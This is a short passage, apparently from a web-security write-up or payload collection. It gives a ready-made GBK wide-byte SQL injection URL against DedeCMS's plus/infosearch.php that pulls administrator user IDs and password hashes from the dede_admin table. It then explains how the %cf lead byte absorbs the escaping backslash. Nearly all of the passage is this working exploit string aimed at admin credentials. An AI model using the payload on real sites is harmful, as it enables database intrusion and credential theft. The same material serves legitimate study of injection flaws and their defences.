http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
%cf is a lone GBK lead byte: when escaping prefixes the quote with a backslash (0x5c, a valid GBK trail byte), the two bytes merge into one character and the quote survives into the query, the same wide-byte trick as the GBK injection above.